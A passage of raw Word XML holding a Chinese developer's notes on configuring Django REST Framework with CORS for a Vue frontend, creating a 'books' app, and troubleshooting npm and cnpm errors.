          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>csp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，以便</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>可控制浏览器监听鼠标事件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'django.contrib.admin'</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'django.contrib.auth'</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'django.contrib.contenttypes'</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'django.contrib.sessions'</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'django.contrib.messages'</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'django.contrib.staticfiles'</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>支持跨域</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'corsheaders'</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># DRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'rest_framework'</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B88EE53" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1044D742" w14:textId="77777777" w:rsidR="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># DRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>REST_FRAMEWORK = {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># 'DEFAULT_PERMISSION_CLASSES': [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    #     'rest_framework.permissions.IsAdminUser',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    # ],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    # 'PAGE_SIZE': 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'DEFAULT_RENDERER_CLASSES'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'rest_framework.renderers.BrowsableAPIRenderer'</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'rest_framework.renderers.JSONRenderer'</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ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'DEFAULT_PARSER_CLASSES'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'rest_framework.parsers.JSONParser'</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ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C21227E" w14:textId="77777777" w:rsidR="00C54015" w:rsidRPr="00C54015" w:rsidRDefault="00C54015" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="264906E1" w14:textId="77777777" w:rsidR="00162DA7" w:rsidRDefault="00162DA7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A19F17E" w14:textId="4FF1B29B" w:rsidR="00446422" w:rsidRDefault="00446422" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="636" w:name="_Toc159780066"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:bookmarkEnd w:id="636"/>
    </w:p>
    <w:p w14:paraId="06BA3016" w14:textId="77777777" w:rsidR="00446422" w:rsidRDefault="00446422" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B450988" w14:textId="6A1ABFDC" w:rsidR="00711710" w:rsidRDefault="00711710" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加新的名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>books</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的应用，并在新应用中添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>urls</w:t>
      </w:r>
      <w:r>
        <w:t>.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，方便后面的路由配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE66EE5" w14:textId="77777777" w:rsidR="00711710" w:rsidRPr="00294F18" w:rsidRDefault="00711710" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294F18">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>python manage.py startapp books</w:t>
      </w:r>
      <w:r w:rsidRPr="00294F18">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C391E68" w14:textId="77777777" w:rsidR="00711710" w:rsidRDefault="00711710" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>cd books</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A99AAAC" w14:textId="6650661A" w:rsidR="00162DA7" w:rsidRDefault="00711710" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>touch urls.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54356685" w14:textId="77777777" w:rsidR="00162DA7" w:rsidRDefault="00162DA7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FAAD496" w14:textId="77777777" w:rsidR="00162DA7" w:rsidRDefault="00162DA7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77AA30EA" w14:textId="77777777" w:rsidR="00162DA7" w:rsidRDefault="00162DA7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57238A93" w14:textId="6E8E7DF9" w:rsidR="00162DA7" w:rsidRDefault="00162DA7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09881620" w14:textId="270932B1" w:rsidR="00162DA7" w:rsidRDefault="00791815" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="637" w:name="_Toc159780067"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>遇到的问题</w:t>
      </w:r>
      <w:r w:rsidR="00294F18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00294F18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r w:rsidR="00294F18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00294F18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cnpm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="637"/>
    </w:p>
    <w:p w14:paraId="7D08F07D" w14:textId="77777777" w:rsidR="00791815" w:rsidRDefault="00791815" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AFEECCF" w14:textId="77777777" w:rsidR="00791815" w:rsidRDefault="00791815" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm cnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">npm install </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">remove  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  cnpm install </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">remove </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有什么区别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CFB5B8" w14:textId="77777777" w:rsidR="00791815" w:rsidRDefault="00791815" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：为什么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卸载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要联网？这是为什么？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7AF244" w14:textId="77777777" w:rsidR="00791815" w:rsidRDefault="00791815" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：我执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">cnpm remove axios </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">npm ERR! Cannot read properties of null (reading </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>'matches')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7328BD82" w14:textId="76ACEACD" w:rsidR="00791815" w:rsidRPr="00791815" w:rsidRDefault="00791815" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：我运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">npm run dev, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跑起来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是页面显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cannot GET /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，是什么原因？是前端问题，还是前后端未联通导致的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C5929B" w14:textId="77777777" w:rsidR="00162DA7" w:rsidRDefault="00162DA7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07EB7A28" w14:textId="1D6D74B1" w:rsidR="00B83635" w:rsidRPr="00B83635" w:rsidRDefault="00B83635" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B83635">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>卸载不掉，报错：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A961B00" w14:textId="7BA54F0C" w:rsidR="00162DA7" w:rsidRDefault="00B83635" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FD682F0" wp14:editId="10816710">
            <wp:extent cx="3160502" cy="1778876"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="49118857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88578" name="图片 1" descr="文本&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId165"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3167638" cy="1782893"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C012CAD" w14:textId="77777777" w:rsidR="00B83635" w:rsidRPr="00B83635" w:rsidRDefault="00B83635" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B83635">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>npm ERR! Cannot read properties of null (reading 'matches')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141BBC05" w14:textId="77777777" w:rsidR="00B83635" w:rsidRPr="00B83635" w:rsidRDefault="00B83635" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0708D720" w14:textId="77777777" w:rsidR="00B83635" w:rsidRPr="00B83635" w:rsidRDefault="00B83635" w:rsidP="009222EB">
